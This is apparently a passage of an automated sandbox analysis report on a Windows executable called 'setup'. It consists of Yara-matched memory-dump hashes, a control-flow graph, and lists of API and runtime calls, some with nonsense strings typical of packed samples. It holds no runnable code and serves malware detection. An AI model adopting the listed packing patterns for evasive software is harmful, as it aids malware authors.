                • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                • Instruction Fuzzy Hash: C8B1D433D5A5F3058735852D05182BBEEA26E81B4131FC396DCD43F289C62AAEA692D4
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction ID: 3de16a87a5335c59667854999131c2f899a51347c8f30d473bd38a955253a306
                • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction Fuzzy Hash: ABC1ADB5E003599FDB54CFA9C881ADEFBF0FF48204F24856AE919E7301E334AA458B55
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                • Instruction ID: b667aff64fe52e087425b265b075073e74192496e7e1c6fbcc56ef760a6d1a41
                • Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                • Instruction Fuzzy Hash: 09B193A0039FA686CBD3FF30951024BF7E0BFC524DF44194AD99986864EF3EE94E9215
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                • Instruction ID: 890dddecd04695d8a5f3bc7a9a29e3d2a89a55e488b51edc356585554041a0ed
                • Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                • Instruction Fuzzy Hash: F89114739187BA06D7609EAE8C441B9B6E3AFC4210F9B077ADD9467282C9709E0697D0
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                • Instruction ID: 63c097b9338499a9c5bc76954a372a4afc588a996b0ccdb086773bc29cd1f200
                • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                • Instruction Fuzzy Hash: 11B169B5E002199FCB84CFE9C885ADEFBF0FF48210F64816AD919E7201E334AA558B54
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                • Instruction ID: 416fe3be09f0c7f3cfd3e4a1b485eb113e2a8dc6f2b18c53a35df1f55557d20a
                • Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                • Instruction Fuzzy Hash: 5771D473A20B254B8314DEB98D94192F2F1EF88610B57C27CCE84D7B45EB31B95A96C0
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                • Instruction ID: 6b17cfe2c7a6a8c13339304d311f135c90af86e1581fbdd0cd6deb06c5fc48f2
                • Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                • Instruction Fuzzy Hash: 978137B2A047019FC328CF19D88566AF7E1FFD8210F15892DE99E83B41D770F8558B92
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                • Instruction ID: e1a1fe103187c1d8909e91576f94a811756b84c7f301d63f45fc1be76bc9f5d3
                • Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                • Instruction Fuzzy Hash: 5A710622535B7A0AEBC3DA3D881046BF7D0BE4910AB850956DCD0F3181D72EDE4E77A4
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                • Instruction ID: 85bf1e4dc3159ef8f6ff38fdd7b9ad98e9931b4646b919aaa8d4c38f89980ef3
                • Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                • Instruction Fuzzy Hash: 0A814775A10B669BD754CF2AD8C046AFBF1FF08210B518A2ADCA583B40D334F565DFA4
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                • Instruction ID: 3a788128df3be179f3c0fa066eafa0e0bfc258f9397d7442ad0d932f5ccd2ebb
                • Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                • Instruction Fuzzy Hash: 6761A3339046BB5BDB649E6DD8401A9B7A2BFC4310F5B8A75DC9823642C234EA11DBD0
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                • Instruction ID: 40ef7157c96be57fd15fdd1b2f461d2bfc446e6bd159153691e2973a3e2caca1
                • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                • Instruction Fuzzy Hash: 46617C3791262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                • Instruction ID: 7e0fe773c36a060246442c1f59264e26b5103f818bb5e70621970631effe2932
                • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                • Instruction Fuzzy Hash: 0351DD229257B945EBC3DA3D88504BEBBE0BE49106B460557DCD0B3181C72EDE4DB7E4
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
                • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
                Memory Dump Source
                • Source File: 00000000.00000002.2088895615.0000000001F3C000.00000040.00000020.00020000.00000000.sdmp, Offset: 01F3C000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1f3c000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                • Instruction ID: 58245c9b868e41dd907742d65006b1f1c2ba0a8e7646cea26371e6e4662f2fc4
                • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                • Instruction Fuzzy Hash: 65316979806281DFDB16CEB4D891AB5BB70EF87224F5885DDC0858B106D326604BC794
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                • Instruction ID: 92c54417d196c6fbc05f4660949ca2b27123280756fded85c09dbf0b3fbe725c
                • Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                • Instruction Fuzzy Hash: 4C3112306183419FD741EF29C880A8BFBE1FFC8258F01D919F9889B221D730E985DA62
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                • Instruction ID: c0fbee6cc14a23f563690f3d530b4a91f820be60aa222fd54ba1758f734b88e5
                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                • Instruction Fuzzy Hash: F911087B24134253D697862ED8B46BAE3DDEBCE32972C427BD18A4B658D322E145B600
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                • Instruction ID: 365c4b7840b3c4de9ef22970e91ee6773d535739af627df725fe4f87fb230c2d
                • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                • Instruction Fuzzy Hash: 6E113D0A8492C4BDCF424A7840E56EBFFA58E2B218F4A71DA88C44B743D01B150FE7A1
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction ID: c5fe8f75d0f11ecad24f776f89d8daf8f1ae2e865b24051f289d2aa2e4f35afa
                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction Fuzzy Hash: 22118E72340200AFEB55DF65DC90FA673EAFB88320B1981A5ED48CB311D676E841CB60
                Memory Dump Source
                • Source File: 00000000.00000002.2088895615.0000000001F3C000.00000040.00000020.00020000.00000000.sdmp, Offset: 01F3C000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1f3c000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction ID: cd1dd7fc9470ce42c414b789b6b44862ff896ad0b959825ccf29b4cf9ba5a673
                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction Fuzzy Hash: DF11A1B3340101AFD754DF59DCC0FA6B7EAEB89320B198066ED08DB312D676E842C760
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                • Instruction ID: 45f2acb25bf74ad1f7e71443f9c41a8a8137bcd2b9c5ef69a8e48734d7533cfd
                • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                • Instruction Fuzzy Hash: D30128769107629BD741DF3EC8C045AFBF1BB082217528B2ADC9083A41D334E666DBE4

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 167 40c8c4-40c8d6 GetModuleHandleW 168 40c8e1-40c929 GetProcAddress * 4 167->168 169 40c8d8-40c8e0 call 40c611 167->169 170 40c941-40c960 168->170 171 40c92b-40c932 168->171 174 40c965-40c973 TlsAlloc 170->174 171->170 173 40c934-40c93b 171->173 173->170 176 40c93d-40c93f 173->176 177 40c979-40c984 TlsSetValue 174->177 178 40ca3a 174->178 176->170 176->174 177->178 179 40c98a-40c9d0 call 40cbb8 EncodePointer * 4 call 411f2c 177->179 180 40ca3c-40ca3e 178->180 185 40c9d2-40c9ef DecodePointer 179->185 186 40ca35 call 40c611 179->186 185->186 189 40c9f1-40ca03 call 40a122 185->189 186->178 189->186 192 40ca05-40ca18 DecodePointer 189->192 192->186 194 40ca1a-40ca33 call 40c64e GetCurrentThreadId 192->194 194->180
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0040967E), ref: 0040C8CC
                • __mtterm.LIBCMT ref: 0040C8D8
                  • Part of subcall function 0040C611: DecodePointer.KERNEL32(00000005,0040CA3A,?,0040967E), ref: 0040C622
                  • Part of subcall function 0040C611: TlsFree.KERNEL32(0000001B,0040CA3A,?,0040967E), ref: 0040C63C
                  • Part of subcall function 0040C611: DeleteCriticalSection.KERNEL32(00000000,00000000,77375810,?,0040CA3A,?,0040967E), ref: 00411F93
                  • Part of subcall function 0040C611: _free.LIBCMT ref: 00411F96
                  • Part of subcall function 0040C611: DeleteCriticalSection.KERNEL32(0000001B,77375810,?,0040CA3A,?,0040967E), ref: 00411FBD
                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0040C8EE
                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040C8FB
                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0040C908
                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0040C915
                • TlsAlloc.KERNEL32(?,0040967E), ref: 0040C965
                • TlsSetValue.KERNEL32(00000000,?,0040967E), ref: 0040C980
                • __init_pointers.LIBCMT ref: 0040C98A
                • EncodePointer.KERNEL32(?,0040967E), ref: 0040C99B
                • EncodePointer.KERNEL32(?,0040967E), ref: 0040C9A8
                • EncodePointer.KERNEL32(?,0040967E), ref: 0040C9B5
                • EncodePointer.KERNEL32(?,0040967E), ref: 0040C9C2
                • DecodePointer.KERNEL32(0040C795,?,0040967E), ref: 0040C9E3
                • __calloc_crt.LIBCMT ref: 0040C9F8
                • DecodePointer.KERNEL32(00000000,?,0040967E), ref: 0040CA12
                • GetCurrentThreadId.KERNEL32 ref: 0040CA24
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                • API String ID: 3698121176-3819984048
                • Opcode ID: 4c548b5ebd70f1ed609b171aff1d1ebf0c11147434c4e9f974672cb379db3375
                • Instruction ID: 762f5b1bd2ab1e6807458a6a7b7d8c4e65e818df7965408c3995a9aac59ad9f7
                • Opcode Fuzzy Hash: 4c548b5ebd70f1ed609b171aff1d1ebf0c11147434c4e9f974672cb379db3375
                • Instruction Fuzzy Hash: BF317430901710DBD721DFB5AD4862A3AA4AF66B607144A3BF450A22F0DF78D446AF98
                APIs
                • CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040534F
                • CreateEventW.KERNEL32(00000000,00000000,00000000,Bedowe cukon nov), ref: 00405360
                • GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 0040536F
                • GetFirmwareEnvironmentVariableW.KERNEL32(Voyapeyifer hivaco takari yusu sop,Pogixucugal,?,00000000), ref: 00405389
                • ReadConsoleInputW.KERNEL32(00000000,?,00000000), ref: 0040539C
                • PulseEvent.KERNEL32(00000000), ref: 004053A4
                • FindFirstVolumeMountPointA.KERNEL32(Nigiwiyu sece,?,00000000), ref: 004053B9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: Event$ConsoleCopyCreateEnvironmentFileFindFirmwareFirstInfoInputMountPointPulseReadVariableVolume
                • String ID: *gA$Bedowe cukon nov$Nigiwiyu sece$Pogixucugal$Voyapeyifer hivaco takari yusu sop
                • API String ID: 3897010762-248823370
                • Opcode ID: a4d785b26d73acf3e2d6712bc49d466d9852393de91d21f94da9999cc76b2c1d
                • Instruction ID: 5699f872e795e21c22ec82fd81d665cf1610561aae1d5e1e9a46aa77a3125b41
                • Opcode Fuzzy Hash: a4d785b26d73acf3e2d6712bc49d466d9852393de91d21f94da9999cc76b2c1d
                • Instruction Fuzzy Hash: B911CA35348381EFE330DB50DC4AFA577A4BB9A701F108069F684B62E1DAB41549CF67
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                • String ID:
                • API String ID: 1442030790-0
                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction ID: 2b7ab8485241d4a8afb1042bd0b0968a1cfad6ce2b8b48b914cd3da813c1216d
                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction Fuzzy Hash: 7B21A136604700FFE7637F65DC01E8BBBEEDF46760B508029E449550A4EB238550FE58
                APIs
                • _memset.LIBCMT ref: 02033F51
                  • Part of subcall function 02035BA8: __getptd_noexit.LIBCMT ref: 02035BA8
                • __gmtime64_s.LIBCMT ref: 02033FEA
                • __gmtime64_s.LIBCMT ref: 02034020
                • __gmtime64_s.LIBCMT ref: 0203403D
                • __allrem.LIBCMT ref: 02034093
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020340AF
                • __allrem.LIBCMT ref: 020340C6
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020340E4
                • __allrem.LIBCMT ref: 020340FB
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02034119
                • __invoke_watson.LIBCMT ref: 0203418A
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                • String ID:
                • API String ID: 384356119-0
                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction ID: 7efd5b3b67b7b1e9a38c1a32534ff0bc4fed19169ee3218c7d9e47b313c994ce
                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction Fuzzy Hash: 5C71EDB1A00B16AFD7169F79CC81BAAB3FEAF10364F144179E514EB680EB70D9409BD0
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                • String ID:
                • API String ID: 3432600739-0
                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction ID: 180e78b42f3821a02e5c40bc52975e67a4be7aa81a0b3ad90f4cfb77dd4d5585
                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction Fuzzy Hash: DD41CF72904308BFDB03AFA4D980BDE7BEEAF48314F108429E9149A190DB769644FF59
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _free$ExitProcess___crt
                • String ID:
                • API String ID: 1022109855-0
                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction ID: 3cfe0ef589df10de34f668966cd5ba1d1f49ea74ac093d667448399e93c343a4
                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction Fuzzy Hash: 56318233A00350DBCB635F54FC84989B7EEFB18325744866AF909572A0CBB459C9BE94
                APIs
                • std::exception::exception.LIBCMT ref: 0205FC1F
                  • Part of subcall function 0204169C: std::exception::_Copy_str.LIBCMT ref: 020416B5
                • __CxxThrowException@8.LIBCMT ref: 0205FC34
                • std::exception::exception.LIBCMT ref: 0205FC4D
                • __CxxThrowException@8.LIBCMT ref: 0205FC62
                • std::regex_error::regex_error.LIBCPMT ref: 0205FC74
                  • Part of subcall function 0205F914: std::exception::exception.LIBCMT ref: 0205F92E
                • __CxxThrowException@8.LIBCMT ref: 0205FC82
                • std::exception::exception.LIBCMT ref: 0205FC9B
                • __CxxThrowException@8.LIBCMT ref: 0205FCB0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                • String ID: leM
                • API String ID: 3569886845-2926266777
                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction ID: 4566c7f3fd64b811c0499029ef70eb9dc2cd63bd22f48e95b7dc3b7bc8ee592b
                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction Fuzzy Hash: AD1196B9C0030DBBCB00EFA5D855CEEBBB9AB04344B40C566A91897641EB74A3988E94
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc_wprintf$_sprintf
                • String ID:
                • API String ID: 3721157643-0
                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction ID: 43ce777f37529cf5002abb4aabb137c5fdb942afed1726274eebb32654d83968
                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction Fuzzy Hash: 0B11E4B2A017646AC263A7F55C15EFFBADD9F49702F0801A9FE8DD1180DA185A04ABB1
                APIs
                • __getptd_noexit.LIBCMT ref: 0040B460
                  • Part of subcall function 0040C702: GetLastError.KERNEL32(00000100,00000001,0040C783,00000001,004097A3,?,?,00409A0C,?,00000001), ref: 0040C706
                  • Part of subcall function 0040C702: ___set_flsgetvalue.LIBCMT ref: 0040C714
                  • Part of subcall function 0040C702: __calloc_crt.LIBCMT ref: 0040C728
                  • Part of subcall function 0040C702: DecodePointer.KERNEL32(00000000,?,00409A0C,?,00000001), ref: 0040C742
                  • Part of subcall function 0040C702: GetCurrentThreadId.KERNEL32 ref: 0040C758
                  • Part of subcall function 0040C702: SetLastError.KERNEL32(00000000,?,00409A0C,?,00000001), ref: 0040C770
                • __calloc_crt.LIBCMT ref: 0040B482
                • __get_sys_err_msg.LIBCMT ref: 0040B4A0
                • _strcpy_s.LIBCMT ref: 0040B4A8
                • __invoke_watson.LIBCMT ref: 0040B4BD
                • _raise.LIBCMT ref: 0040B4CE
                • __call_reportfault.LIBCMT ref: 0040B4E6
                Strings
                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 0040B46D, 0040B490
                Memory Dump Source
